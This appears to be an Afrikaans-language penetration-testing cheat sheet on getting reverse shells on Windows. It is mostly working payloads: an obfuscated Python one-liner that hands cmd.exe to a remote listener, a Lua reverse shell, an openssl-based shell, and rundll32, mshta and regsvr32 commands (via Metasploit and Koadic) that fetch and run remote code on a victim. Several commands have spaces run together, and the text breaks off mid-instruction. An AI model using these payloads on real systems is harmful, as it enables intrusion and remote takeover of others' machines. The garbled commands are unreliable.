Die bladsy lolbas-project.github.io is vir Windows soos https://gtfobins.github.io/ vir linux is.
Dit is duidelik, daar is geen SUID lêers of sudo regte in Windows nie, maar dit is nuttig om te weet hoe sommige binaries (mis)bruik kan word om 'n soort onverwagte aksies uit te voer soos arbitraire kode uit te voer.
sbd is 'n draagbare en veilige Netcat alternatief. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk versleuteling, programuitvoering, aanpasbare bronpoorte, en deurlopende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows gebruikers kan die sbd.exe weergawe van die Kali Linux verspreiding as 'n betroubare vervanging vir Netcat gebruik word.
#WindowsC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
lua5.1-e'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
OpenSSH
Aanvaller (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response
<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --><!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><scriptlet><public></public><scriptlanguage="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>
Rundll32 - Metasploit
usewindows/smb/smb_deliveryrun#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
Rundll32 - Koadic
usestager/js/rundll32_jssetSRVHOST192.168.1.107setENDPOINTsalesrun#Koadic will tell you what you need to execute inside the victim, it will be something like:rundll32.exejavascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
usemulti/script/web_deliverysettarget3setpayloadwindows/meterpreter/reverse/tcpsetlhost10.2.0.5run#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager regsvr
In die Skale gids, is daar 'n klomp verskillende skale. Om Invoke-PowerShellTcp.ps1 te aflaai en uit te voer, maak 'n kopie van die skrif en voeg by die einde van die lêer: